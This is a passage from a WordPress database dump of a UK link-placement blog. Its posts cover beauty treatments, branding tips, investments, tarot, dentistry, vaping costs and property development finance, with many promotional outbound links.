/></a></h2>\r\n<h2></h2>\r\n<h2>Be transformed with beauty treatments</h2>\r\n<p class=\"intro\">We offer outstanding beauty treatments covering hair removal, spray tanning, nail care and more. From false eyelashes to waxing, you can be assured of a top quality service and great value every time.</p>\r\nLondon salons have comprehensive facilities and are well equipped to deal with any beauty request. This all contributes to an atmosphere that is welcoming, comfortable and friendly, which keeps clients coming back for more.\r\n\r\nIf you\'re in the mood for a relaxing trip to the salon, rely on us to provide everything you need. <a href=\"http://www.westonspirit.org.uk/contact-us\">Contact us</a> or drop by today to find out more about our range of professional treatments.\r\n\r\n</div>\r\n</div>\r\n<div class=\"contents\">\r\n<div>\r\n<h3></h3>\r\n<h3>Choose from a wide range of beauty care options:</h3>\r\n<ul>\r\n 	<li><a href=\"/\"><img class=\"alignright wp-image-580 size-full\" src=\"http://www.westonspirit.org.uk/wp-content/uploads/2018/07/beauty-2.jpg\" alt=\"beauty treatment london 2018\" width=\"270\" height=\"450\" /></a>Manicure &amp; Pedicure</li>\r\n 	<li>Nail Art</li>\r\n 	<li>Eye enhancing treatments</li>\r\n 	<li>Facials</li>\r\n 	<li>Waxing</li>\r\n 	<li>Fake Bake Tanning</li>\r\n 	<li>Body treatments</li>\r\n 	<li>Advanced skincare</li>\r\n 	<li>Packages available</li>\r\n</ul>\r\n<em>Whether you\'re in need of professionally applied semi permanent make up for your big day or just want to treat yourself, you can find the package or treatment to suit you.</em>\r\n<h3></h3>\r\n<h3>Start a new career in the beauty industry</h3>\r\n<strong>Are you looking for an exciting new career?</strong> The beauty industry is booming, especially <strong>semi permanent makeup treatments.</strong> The latest celebrity trends for bold dramatic eyebrows has meant a huge increase in demand for microblading and semi permanent brow treatments.\r\n\r\n<strong>Get qualified in just a few weeks with a level 4 course in microblading and brow techniques.</strong> Want to find out more? <a href=\"http://www.naturalenhancement.co.uk/permanent-makeup-training\" target=\"_blank\" rel=\"noopener\">Click here for courses in London</a>.\r\n\r\n&nbsp;\r\n\r\n<em>Check out some more of our health and wellness articles:</em>\r\n<ul>\r\n 	<li><a href=\"http://www.westonspirit.org.uk/smiling-all-the-way-to-the-dentist\">Cosmetic dentistry for a great smile</a></li>\r\n 	<li><a href=\"http://www.westonspirit.org.uk/putting-the-fun-into-fitness\">Start a fitness regime</a></li>\r\n 	<li><a href=\"http://www.westonspirit.org.uk/staying-off-the-statins\">Heart health</a></li>\r\n</ul>\r\n<a href=\"http://survivingwinter.org.uk/links\" target=\"_blank\" rel=\"noopener\"><em>Click here for more online resources</em></a>\r\n\r\n</div>\r\n</div>\r\n</div>','Treat yourself with a pampering beauty treatment','','publish','open','open','','treat-yourself-with-a-pampering-beauty-treatment','','\nhttp://survivingwinter.org.uk/links','2018-07-04 09:46:52','2018-07-04 09:46:52','',0,'http://www.westonspirit.org.uk/?p=577',0,'post','',0),(585,1,'2018-07-04 09:35:18','2018-07-04 09:35:18','','Contact us','','publish','closed','closed','','contact-us','','','2018-07-04 09:35:18','2018-07-04 09:35:18','',0,'http://www.westonspirit.org.uk/?page_id=585',0,'page','',0),(592,1,'2018-07-10 11:35:28','2018-07-10 11:35:28','<strong>Street marketing can contribute massively to brand awareness.</strong>\r\n\r\n<em>Here\'s how.</em>\r\n\r\nStreet marketing provides many tools, but it is important that brand identity is recognised throughout and should be relevant to customers at all times.<!--more-->\r\n\r\nFor example, if a sports brand decides to sponsor a sports event, if the brand corresponds with what the event is about and provides a modern twist on things, you are more likely going to be recognised.\r\n\r\nDo you need help with street marketing strategies, ideas and plans? There is no better place to go than StreetPR. This company has been one of the UK\'s most successful street marketing companies for years and works across the UK in cities such as <a href=\"https://www.streetpr.co.uk/uk/cambridge\" target=\"_blank\" rel=\"noopener\">Cambridge</a> and Oxford. <em>(Great for student marketing too).</em>\r\n<blockquote>Find out about <a href=\"http://googleplusblog.co.uk/branding-essential-success-business\" target=\"_blank\" rel=\"noopener\">branding for business success.</a></blockquote>\r\n<h2>35 Useful Reminders Tips for your branding</h2>\r\n<ol>\r\n 	<li>Your brand is your business credibility</li>\r\n 	<li>Credibility is found not through cash, but through expertise</li>\r\n 	<li>A key credibility attribute is stability</li>\r\n 	<li>20% of your branding is your idea and message</li>\r\n 	<li>The further 80% is operational</li>\r\n 	<li>If your brand is consistent, and saleable, it is cost effective</li>\r\n 	<li>A consistent brand builds the first point of credibility</li>\r\n 	<li>The most recognisable brand in the world, McDonalds, built itself on credibility</li>\r\n 	<li>Taking brand action requires you to be personally motivated</li>\r\n 	<li>Being personally motivated can allow you to effectively reposition your brand</li>\r\n 	<li>Your branding message must be clear and concise</li>\r\n 	<li>You know your brand in and out, so differentiate it</li>\r\n 	<li>Your brands body language IS important, so don\'t open your mouth without thinking</li>\r\n 	<li>A brand strategy requires time and the needs of yourself need to be evaluated</li>\r\n 	<li>Typical questions to ask you during a strategy are; who are we? Who needs to know this? How will they find out?</li>\r\n 	<li>Customer focused equity in your branding is an intangible asset, and vastly important</li>\r\n 	<li>A strong customer equity means you have a more predictable source of income than the latter</li>\r\n 	<li>Sponsorships can be hugely appealing to large and small brands (see 19, 20.)</li>\r\n 	<li>Sponsoring a charity run is fantastic</li>\r\n 	<li>Sponsoring a book about how to train a dog to jump through a hoop with a bandana on is a no go</li>\r\n 	<li>Internet based branding is a growing market, and you SHOULD join the game</li>\r\n 	<li>For a business to be successful online they need experts to help them through it (see 23.)</li>\r\n 	<li>Typical experts include branding experts, online marketing experts and website developers</li>\r\n 	<li>One of the single best ways to increase your brands awareness are surveys</li>\r\n 	<li>When branding your business you must seek out and mix multiple media formats (see 26.)</li>\r\n 	<li>Media formats could include; brochures, surveys, business cards, billboards, PPC and SEO</li>\r\n 	<li>The placement of all these media formats is essential for your brand (see 28.)</li>\r\n 	<li>Don\'t waste a brochure or anything brand related by putting it somewhere nobody can find it</li>\r\n 	<li>A branding budget should ONLY be decided once a strategy is put forth (see 30.)</li>\r\n 	<li>A budget is the single thing which can hold a strategy back, so expect a ВЈВЈВЈВЈ digit sum</li>\r\n 	<li>Your brand is your image, but dot be scared of buying up keyword rich niche related domains to blog off</li>\r\n 	<li>A blog is a hugely beneficial tool for your brand</li>\r\n 	<li>As with all media, including blogs, you must target the right people with your brand (see 34.)</li>\r\n 	<li>We recommend you break down the profile of your ideal customer e.g. John; he\'s 35, degree educated, middle class etc</li>\r\n 	<li>Develop a mission statement that shows your own reason for being and the value you provide to your customers</li>\r\n</ol>\r\n<a href=\"http://tickpc.co.uk/benefits-digital-branding\" target=\"_blank\" rel=\"noopener\">Click here</a> to see the tips of digital branding.','Branding Tips','','publish','open','open','','branding-tips','','\nhttp://tickpc.co.uk/benefits-digital-branding','2018-10-11 14:00:58','2018-10-11 14:00:58','',0,'http://www.westonspirit.org.uk/?p=592',0,'post','',0),(598,1,'2018-10-11 13:59:06','2018-10-11 13:59:06','<h2><strong>What are your Investment options?</strong></h2>\r\nSecuring yours and your family’s future is incredibly important. <strong>Investing your money can be a way to secure funding and protect yourself in the future. </strong><!--more-->\r\n\r\n<strong>We cover three popular investments</strong> that are available for you. Before investing, we strongly recommend researching the type of investment further to ensure it is the right choice and opportunity for you.\r\n\r\n&nbsp;\r\n<h2><strong><a href=\"https://www.hunterfinance.co.uk/\">Property Development</a></strong></h2>\r\n<strong>Property development</strong> is an <em>increasingly popular</em> choice for many in the UK. Unlike other investment options, <strong>you’ll be increasingly likely to see the returns of your investment far quicker. </strong>\r\n\r\n<em>You may feel</em> that property development can be a costly venture to undertake given the price of buying land and constructing the properties. However, given that banks have several restrictive guidelines and criteria’s, <a href=\"https://www.hunterfinance.co.uk/development-finance-vs-bank/what-to-do-when-the-bank-says-no\" target=\"_blank\" rel=\"noopener\">private property developer lenders</a> are a <strong>popular alternative for securing funding. </strong>\r\n\r\n&nbsp;\r\n<h2><strong><a href=\"https://www.nerdwallet.com/blog/investing/how-to-buy-stocks/\">Stocks</a></strong></h2>\r\nWhen a company is listed on the stock market, <strong>it gives you an opportunity to buy and own a piece of that company. </strong>Stocks can come in all shapes and sizes <em>depending on the industry</em> you’re investing in and the size of that particular company.\r\n\r\nStocks can be largely rewarding <strong>however</strong> the success of your stock <strong>is dependent on external factors that aren’t influenced by you. </strong>\r\n\r\n&nbsp;\r\n<h2><strong><a href=\"http://www.finra.org/investors/insurance\">Life Insurance</a></strong></h2>\r\nIf you’re focused on securing your family’s financial future, researching life insurance products can <strong>be greatly beneficial and prove your family with the security you want. </strong>\r\n\r\nLife insurance can help you manage your finance and expenses as you get older. Depending on your health and age, <strong>there are various products that are available to you today. </strong>','Potential Investments to Secure Your Long-Term Future','','publish','open','open','','potential-investments-to-secure-your-long-term-future','','','2018-10-25 08:48:14','2018-10-25 08:48:14','',0,'http://www.westonspirit.org.uk/?p=598',0,'post','',0),(605,1,'2018-10-19 07:20:20','2018-10-19 07:20:20','<h2>The History Behind Tarot Cards</h2>\r\nFor centuries, tarot cards have been a <em>trusted and popular tool</em> used by psychic readers that have spiritual gifts that <strong>they utilise to help others.</strong> It’s a <em>lifestyle</em> for many and with <em>various</em> other tools, they believe that they have a <strong>gift to see beyond this realm. </strong><!--more-->\r\n\r\nToday, Westonspirit gets in touch with its spiritual side to get a better understanding of <a href=\"https://www.clairvoyant.co/tarot/tarot-cards-and-their-meaning\">how tarot card readings continue</a> to help millions around the world.\r\n\r\n&nbsp;\r\n<h3>A Type of Therapy</h3>\r\nAt this very moment, the human race is <em>connected</em> as ever. We’re capable of making a visually-clear video call to someone across the world. <em>However</em>, there’s an increasing problem with those that <strong>feel isolated and alone. </strong>\r\n<p style=\"text-align: center;\"><strong>Tarot cards have begun to provide an outlet and guidance to those that seek it.</strong></p>\r\nA common <em>misconception</em> with those that use tarot cards is that they can tell every little detail about the future.<em> If they know the future, why can’t they tell me the lottery numbers?</em> Tarot cards are <strong>designed to help those spiritually</strong> and <a href=\"https://hellogiggles.com/lifestyle/why-i-use-tarot/\">provide guidance to help ease stress.</a>\r\n\r\n&nbsp;\r\n<h3>A Clear Understanding of Your Journey</h3>\r\nA common reason why <a href=\"https://www.smh.com.au/lifestyle/life-and-relationships/how-tarot-cards-became-an-essential-part-of-my-daily-existence-20170612-gwpfuv.html\">many attend tarot card readings</a> is that of <strong>the clarity it provides.</strong> Those that regularly visit clairvoyants or psychic readers believe that tarot cards provide them with an <em>overview</em> <strong>they wouldn’t be able to see alone.</strong>\r\n<blockquote><em>“It’s become a popular tool and outlet for those that are affected by decisions and choices. Those that struggle to make decisions alone have begun to use tarot card readings as a way to evaluate the options available to them.”</em></blockquote>\r\n<strong>Self-believe</strong> is incredibly important when seeking a tarot card reading. There has to be a willingness to embrace the reader and allow them to <strong>perform their session without any scepticism.</strong>','How Can a Tarot Card Reading Help You?','','publish','open','open','','how-can-a-tarot-card-reading-help-you','','','2018-10-19 07:20:20','2018-10-19 07:20:20','',0,'http://www.westonspirit.org.uk/?p=605',0,'post','',0),(613,1,'2019-02-18 14:39:20','2019-02-18 14:39:20','<h2></h2>\r\n<h2>These are basic dental services and what most dentists can offer you.</h2>\r\nThe very best dentists will use modern technology to make visits safer and better.\r\n\r\nWe have a relaxed friendly atmosphere at our surgery. The practice is centrally located in the village with free parking.  Children are always welcome and of course, under 18\'s (under 19 if in full-time education) are treated under the NHS scheme. Limited adult NHS appointments are available with our current dentist so <a href=\"http://www.westonspirit.org.uk/contact-us\">please contact us.</a>\r\n<h3>Checkups &amp; Prevention</h3>\r\n<h4>Keeping your teeth in tip-top shape.</h4>\r\nWe offer a comprehensive range of dental services via DENPLAN or privately for adults. All children under 18 (under 19 if in full time education) are seen under the normal NHS scheme.\r\n<h3>Dentures</h3>\r\n<h4>We offer a full range of denture services.</h4>\r\nDentures are removable substitutes for missing teeth. They are usually made from an acrylic base, which is fitted with acrylic artificial teeth.\r\n\r\n<img class=\"alignnone size-full wp-image-615\" src=\"http://www.westonspirit.org.uk/wp-content/plugins_pics/2019/02/visit-dentist.jpg\" alt=\"Visit your local dentist\" width=\"960\" height=\"660\" />\r\n<h2></h2>\r\n<h3>Tooth Whitening</h3>\r\n<h4>Make a noticeable difference to your smile.</h4>\r\nBleaching can make a noticeable difference to your smile leaving you looking younger and more confident. <a href=\"https://destinationsmile.com/11-benefits-professional-teeth-whitening/\" target=\"_blank\" rel=\"noopener\">See the benefits here</a>.\r\n<h3>Veneers and Implants</h3>\r\n<h4>Enhance your smile.</h4>\r\nThe appearance of veneers can dramatically change your smile. <a href=\"https://dorsetdentalimplants.com/\" target=\"_blank\" rel=\"noopener\">Click here more information on Implants in Dorset</a>\r\n<h2>Facial Rejuvenation</h2>\r\n<h4>Facial Rejuvenation Naturally.</h4>\r\nOur facial rejuvenation service is a natural way to address the signs of facial ageing. This technique is surgery, toxin and injection-free. <a href=\"https://www.webmd.com/beauty/laser-skin-resurfacing#1\" target=\"_blank\" rel=\"noopener\">See laser skin resurfacing</a>.\r\n<h2>Fillings</h2>\r\n<h4>Metal and White based fillings.</h4>\r\nFillings can be of silver amalgam or more contemporary white plastic. <strong>The choice is yours.</strong>','Top Dental Treatments in London and Dorset','','publish','closed','closed','','top-dental-treatments-in-london','','','2019-12-05 11:52:23','2019-12-05 11:52:23','',0,'http://www.westonspirit.org.uk/?page_id=613',0,'page','',0),(620,1,'2019-03-05 16:01:14','2019-03-05 16:01:14','Thinking about quitting smoking?  Apart from being less deadly and less intrusive, vaping is also much less expensive than smoking.  Even the wealthy care about saving money where they can and there is no doubt that smoking can be a very expensive habit.  If you are looking for a few excuses to pick up an e-cig, here are five ways that vaping can save you money!\r\n\r\n<img class=\"alignnone size-full wp-image-622\" src=\"http://www.westonspirit.org.uk/wp-content/uploads/2019/03/saving-money.jpg\" alt=\"How to save money\" width=\"960\" height=\"640\" />\r\n\r\n&nbsp;\r\n<h2>NO MORE BURNT CLOTHES</h2>\r\nHow many times have you flicked ash only to have it come back and burn your clothes?  It happens much more often than it should and replacing those clothes really adds up.  Vaping is smokeless and heatless, which means that you will never have to worry about burning a cigarette hole in your favourite shirt again. <a href=\"https://www.mayoclinic.org/healthy-lifestyle/adult-health/expert-answers/third-hand-smoke/faq-20057791\" target=\"_blank\" rel=\"noopener\">What are the dangers?</a>\r\n<h2>NO MORE HIGH CLEANING BILL</h2>\r\nSmokers generally don’t realize just how much cigarette smoke lingers on their clothing long after they have put out their cigs until they arrive in an area that is completely free of smoke.  Once realized, however, this odour is something that many people will go to great lengths to get rid of as completely as possible.  There are speciality detergents that can rid clothes of the smell, but those detergents can be expensive and dry cleaning can be even more expensive. <a href=\"https://rainbowintl.com/blog/how-to-get-smoke-damage-out-of-clothes\" target=\"_blank\" rel=\"noopener\">How to remove smoke damage</a>.\r\n<h2>NO MORE EXPENSIVE PACKS</h2>\r\nThe cost of cigarettes continues to rise and there are people who are paying £8-£10 per pack.  For those who smoke a pack or more a day, this expense quickly adds up to thousands of pounds per year.  With an e-cig, however, the e-liquid needed to vape is significantly less, sometimes as low as £10.00/$23.00 for a 10ml bottle of juice, and a 10ml bottle of juice is about the equivalent of 5 packs of cigarettes, depending on the nicotine level of the juice. <a href=\"https://wickandwireco.com/collections/wick-and-wire-co\" target=\"_blank\" rel=\"noopener\">Click here</a> to shop affordable Wick &amp; Wire Co E-liquid.','Top Ways That Vaping Makes Money Sense','','publish','closed','closed','','top-ways-that-vaping-makes-money-sense','','','2019-03-05 16:01:29','2019-03-05 16:01:29','',0,'http://www.westonspirit.org.uk/?page_id=620',0,'page','',0),(627,1,'2019-04-16 16:09:01','2019-04-16 16:09:01','<strong>The UK is unhappy with the appearance of their teeth.</strong> Over 40% are unhappy with the way they look and a further 48% are planning on getting a dental treatment to improve the appearance of their teeth, mouth and smile.\r\n\r\n<!--more-->\r\n<blockquote>In fact, recent studies show that simply by having a better-looking smile, it can help improve your own self-confidence in your own appearance.</blockquote>\r\nFor the last few decades, cosmetic dentistry has grown in popularity when it comes to those looking to have that perfect smile they’ve always dreamt of. At Weston Spirit, we look at how people are getting a better smile and more importantly, the benefits of a <a href=\"https://www.smilemoredentalcare.com/complete-smile\">smile makeover</a>.\r\n<h2><em>A Combination of Dental Treatments…</em></h2>\r\nDental implants and veneers are common treatments when it comes to improving the appearance of one’s smile. In fact, it’s <em>more</em> surprising to find a private dentist that doesn’t offer at least one of those treatments.\r\n\r\nWith a smile makeover, it’s more like a package deal. The process <em>usually</em> involves the dentist assessing and recommending treatments that would be ideal for getting that perfect smile that you want. You might be surprised just how far <a href=\"https://www.marieclaire.co.uk/life/health-fitness/dentistry-597634\">cosmetic dentistry technology</a> has come.\r\n<h2><em>What can a Smile Makeover Fix?</em></h2>\r\n<em>Misaligned teeth? A crooked tooth? Or discoloured teeth?</em> There are a wealth of dental problems that we can’t stop focusing on every time we look in the mirror. It can be frustrating in having to see it every day and feeling insecure about it when we go out with friends.\r\n\r\n<strong>A smile makeover is actually capable of fixing a number of these problems that include:</strong>\r\n<ol>\r\n 	<li>Gummy smiles</li>\r\n 	<li>Missing teeth</li>\r\n 	<li>Chipped teeth</li>\r\n 	<li>Discoloured teeth</li>\r\n 	<li>Gapped teeth</li>\r\n</ol>\r\nNot only does a smile makeover focus on improving your appearances, it actually has a number of oral benefits too! There are a <a href=\"https://www.raconteur.net/healthcare/why-the-uk-public-need-to-take-dental-health-more-seriously\">number of dental oral health issues</a> across the UK public, but a smile makeover can create a perfect smile and a healthy foundation for the future.\r\n\r\nAlways do your research before opting for a smile makeover treatment and find more information on the benefits and if you’re suitable for treatment. Want to do something new? <strong>Discover</strong> the amazement and wonder of a <a href=\"http://www.westonspirit.org.uk/how-can-a-tarot-card-reading-help-you\">tarot card reading</a>.','Can a Smile Makeover Really Change Your Life?','','publish','open','open','','can-a-smile-makeover-really-change-your-life','','','2019-04-16 16:09:01','2019-04-16 16:09:01','',0,'http://www.westonspirit.org.uk/?p=627',0,'post','',0),(632,1,'2019-05-03 14:21:03','2019-05-03 14:21:03','Over the last few years, the cosmetic dentistry industry has been soaring. As more and more people are changing their insecurities, such as crooked, stained or missing teeth, there has been a surge in the amount of people investing in dental braces.\r\n\r\nThere is a range of braces available, including fixed, clear and lingual. Continue reading this article to find out why invisible braces are the top choice for patients across the UK.\r\n<h2>Why Invisalign braces are better than fixed braces</h2>\r\nChoosing the right braces system for straightening misaligned teeth is important for key reasons. Naturally, the orthodontic diagnosis plays an important role in <a href=\"https://www.orthodonticslimited.com/braces/the-5-most-common-types-of-braces/\" target=\"_blank\" rel=\"noopener\">braces selection</a> as some braces systems may treat only mild orthodontic conditions, while others may correct mild to severe dental irregularities.\r\n<h2>Fixed braces versus Invisalign braces</h2>\r\nWhen the word “braces” is mentioned, harsh metal braces with brackets fixed to the front teeth may form as a picture in the mind. Traditionally, these braces systems were used to treat different levels of malocclusion and bite disorder. However, nowadays teeth may be straightened with modern braces systems designed for <em>comfort, hygiene, discretion and effective teeth straightening results.</em>\r\n\r\nEach modern braces system offers unique treatment benefits.\r\n\r\n<strong>Invisalign is a highly versatile modern invisible braces system custom-made for individuals desiring:</strong>\r\n<ol>\r\n 	<li>innovative technology for progressed treatment needs</li>\r\n 	<li><a href=\"https://www.marlboroughdentalstudio.co.uk/2017/04/how-discreet-are-invisalign-braces\" target=\"_blank\" rel=\"noopener\">clear discretion during teeth straightening treatment</a></li>\r\n 	<li>removable aligners to maintain healthy oral hygiene standards</li>\r\n 	<li>faster teeth straightening results</li>\r\n</ol>\r\nMost fixed braces systems consist of metal components that may cause some oral irritation. The Invisalign aligners are made of smooth plastic, resembling a mouth guard that may conveniently be removed for eating and other activities. Fixed braces may affect singing or playing of a musical instrument.\r\n\r\nInvisalign aligners give a gently fit over the front teeth, and may be reinserted as needed according to treatment guidelines. In contrast, fixed braces systems are not removable and although self-ligating may pose challenges for eating and cleaning.\r\n<blockquote>See: <a href=\"https://www.carefreedental.com/resources/27-braces/181-10-important-things-to-know-before-you-get-dental-braces\" target=\"_blank\" rel=\"noopener\">10 Important Things to Know Before You Get Dental Braces</a>.</blockquote>\r\nThe <a href=\"http://braceplace.net/blog/how-long-do-i-have-to-wear-braces/\" target=\"_blank\" rel=\"noopener\">treatment duration</a> for fixed braces may range from 18 to 24 months; however Invisalign gives results within 16 to 18 months when aligners are worn for approximately 22 hours per day. Fixed braces are only removed by a dentist, however Invisalign clear aligners may be removed on a daily basis and are replaced fortnightly with fresh aligners for progressing teeth repositioning.','37% of adults are concerned with their smile','','publish','open','open','','37-of-adults-are-concerned-with-their-smile','','http://braceplace.net/blog/how-long-do-i-have-to-wear-braces/\nhttps://www.orthodonticslimited.com/braces/the-5-most-common-types-of-braces/','2019-05-03 14:25:17','2019-05-03 14:25:17','',0,'http://www.westonspirit.org.uk/?p=632',0,'post','',0),(644,1,'2020-03-09 17:00:18','2020-03-09 17:00:18','<h2><a href=\"/\">The Most Common Oral Health Issues Often Ignored </a></h2>\r\n<strong>Dental Problems are often ignored as they do not seem important until they become serious issues that require immediate attention.</strong>\r\n\r\nThere are a number of things that cause poor oral health and it often comes from a lack of basic care such as brushing teeth twice daily, flossing daily, visiting a dentist at least twice a year and eating healthily.\r\n\r\nTake a look at our list of the most common dental problems that are caused by this lack of basic dental hygiene so you know what to look out for.\r\n<h3>Tooth Decay:</h3>\r\nAlso known as cavities, tooth decay is where the tooth enamel is damaged and broken down by a build-up of plaque on the teeth.\r\n<blockquote>Sugary and acidic food is also big contributory tooth decay. The substance left on the teeth from these things attacks the enamel weakening the teeth, often causing toothache and yellowness.</blockquote>\r\nCavities are most common in children although they are prevalent in all age groups. The best way to <a href=\"https://www.nidcr.nih.gov/health-info/childrens-oral-health/tooth-decay-process\" target=\"_blank\" rel=\"noopener\">avoid this problem</a> is to brush and floss at least two times a day.\r\n<h3>Periodontal Disease:</h3>\r\nPeriodontal Disease is a severe form of gum disease that requires treatment to avoid the loss of teeth. This form of gum disease is an infection of the gums and surrounding teeth that can have a very negative effect on the teeth such as receding gums, plaque build-up and tooth loss.\r\n\r\n<em>While gum disease is more common in adults, anyone is susceptible to it.</em>\r\n\r\nOne of the most common causes of gum disease is poor oral health caused by smoking, closely followed by diabetes and a dry mouth. The symptoms include:\r\n<ul>\r\n 	<li>Painful chewing</li>\r\n 	<li>Sensitive teeth</li>\r\n 	<li>Bleeding and tender gums</li>\r\n 	<li>Bad breath</li>\r\n 	<li>Red gums</li>\r\n</ul>\r\nThe best way to avoid this disease is to make regular appointments at the dentist, improving diet and habits as well as oral hygiene.\r\n\r\nThere are periodontal specialists that can <a href=\"https://www.al-faperio.co.uk/periodontal-disease/periodontal-disease-treatment\" target=\"_blank\" rel=\"noopener\">treat these symptoms</a> before they develop into a more serious form of the disease, as well as reversing its effects.\r\n<h3><a href=\"http://www.westonspirit.org.uk/37-of-adults-are-concerned-with-their-smile\"><img class=\"aligncenter wp-image-646 size-full\" src=\"http://www.westonspirit.org.uk/wp-content/plugins_pics/2020/03/beautiful.jpg\" alt=\"Three common dental problems you need to look out for\" width=\"960\" height=\"658\" /></a></h3>\r\n<h3>Oral Cancer:</h3>\r\n<em>Oral Cancer is one of the most dangerous oral conditions that it often not spotted until later stages. </em>\r\n\r\nDespite this, oral cancer is curable but it is best to catch it before it develops too much.\r\n\r\nIt is generally seen in middle age to older people and is often a cause of <a href=\"https://www.readersdigest.ca/health/healthy-living/10-bad-health-habits-you-can-break/\" target=\"_blank\" rel=\"noopener\">poor health habits</a> such as smoking or excessive alcohol use. Sometimes it is caused by other diseases in the mouth.\r\n\r\nThe symptoms include rough areas in the mouth, lumps and sores as well as difficulty with normal oral movement and functions.\r\n\r\nIn order to avoid this problem, we recommend regular dental visits, improving your general health and looking out for symptoms every now and then.\r\n<h3>More on Health</h3>\r\n<table width=\"245\">\r\n<tbody>\r\n<tr>\r\n<td width=\"245\"><a href=\"http://younglivin.org.uk/\">younglivin.org.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://qualitydent.co.uk/\">qualitydent.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://welovewhiteteeth.co.uk/\">welovewhiteteeth.co.uk</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;','Three common dental problems you need to look out for','','publish','closed','closed','','health-news','','','2020-03-09 17:01:40','2020-03-09 17:01:40','',0,'http://www.westonspirit.org.uk/?page_id=644',0,'page','',0),(653,1,'2021-08-06 13:53:06','2021-08-06 13:53:06','<!-- wp:paragraph -->\n<p><strong>What everyone needs to know before they begin the property development journey!</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When performing a property development, there are things people may have been unaware of when they decided to begin the journey.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unlike how other people may make property development projects seem, deciding to develop properties can come with many risks if the developer has not done their research and does not have the right attitude to be a property developer.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>While it is possible anyone can become a property developer with the right attitude, you will need more than the correct mindset to succeed in the competitive environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><u>People get into property development to increase their income</u></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There will always be a need for housing - not just in the UK, but around the world.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the population rises, we will need more homes to accommodate the increasing population - and property development is the&nbsp;<em>perfect</em>&nbsp;way to do that.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are 29 million homes in the <a rel=\"noreferrer noopener\" href=\"https://www.theccc.org.uk/wp-content/uploads/2019/02/UK-housing-Fit-for-the-future-CCC-2019.pdf\" data-type=\"URL\" data-id=\"https://www.theccc.org.uk/wp-content/uploads/2019/02/UK-housing-Fit-for-the-future-CCC-2019.pdf\" target=\"_blank\">UK</a>, whilst the population of the UK is estimated to be <a href=\"http://(https://www.ons.gov.uk/peoplepopulationandcommunity/populationandmigration/populationestimates\" data-type=\"URL\" data-id=\"(https://www.ons.gov.uk/peoplepopulationandcommunity/populationandmigration/populationestimates\" target=\"_blank\" rel=\"noreferrer noopener\">67 million people.</a> </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Property development is a method to solve the rising number of homeless people across the UK so they do not need to rely upon homeless shelters or sleeping in rough conditions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, before deciding to get into property management, many things need to be considered during the property development journey.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><span style=\"text-decoration: underline;\">Your finance is essential</span></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Development finance is the most important part of getting your property development going!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Many properties do not get built because of inadequate access to receiving development finance. Unlike developers with more income, many first-time buyers may not have the money to fund a property development project on their own so they rely on getting a loan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are unable to get a loan from a traditional bank, there is an <a href=\"https://www.hunterfinance.co.uk/development-finance/\" data-type=\"URL\" data-id=\"https://www.hunterfinance.co.uk/development-finance/\" target=\"_blank\" rel=\"noreferrer noopener\">increase in alternative providers</a> that specialise in providing funding to property developments. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><span style=\"text-decoration: underline;\">Vision</span></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><em>Every property needs a vision to succeed.</em></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Whether you are building a block of flats, a semi-detached home, or a bungalow... your property needs a vision so it can succeed in the property market.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Drawing up plans and having a particular idea of how you would like the property to look will show that there was a lot of thought put into the project - and it could be more appealing to potential buyers and renters. For example, zinc roofs are a really great way to appeal to new, modern buyers - so when building your property, choosing zinc as the <a href=\"https://www.elcroofing.co.uk/roofing-services/zinc-roofs\" data-type=\"URL\" data-id=\"https://www.elcroofing.co.uk/roofing-services/zinc-roofs\" target=\"_blank\" rel=\"noreferrer noopener\">roofing material</a> can make all the difference.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Not only can it increase the value, but can last for over 100 years.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Think of your property development as something&nbsp;you&nbsp;are looking at: if you aren\'t interested in how it looks, then other people may think the same way that you do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Your property development finance should be used to ensure the property is up to all of your standards regarding how it looks and all the features.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><span style=\"text-decoration: underline;\">Construction</span></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Do you need to hire a team that will undertake the construction process?</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Developers rely on their property development finance to cover the costs of the construction process and some property finance lenders provide enough money to cover the construction process.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Be sure that you have an outline of what construction process you need to be done.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Don\'t delay your property development journey, with the right property development finance you can begin your journey much quicker than you expected!&nbsp;</p>\n<!-- /wp:paragraph -->','Everything you need to know about property development','','publish','open','open','','everything-you-need-to-know-about-property-development','','','2021-10-28 16:31:41','2021-10-28 16:31:41','',0,'https://www.westonspirit.org.uk/?p=653',0,'post','',0),(654,1,'2021-08-06 09:12:16','2021-08-06 09:12:16','<!-- wp:paragraph -->\n<p><strong>What everyone needs to know before they begin the property development journey!</strong></p>\n<!-- /wp:paragraph 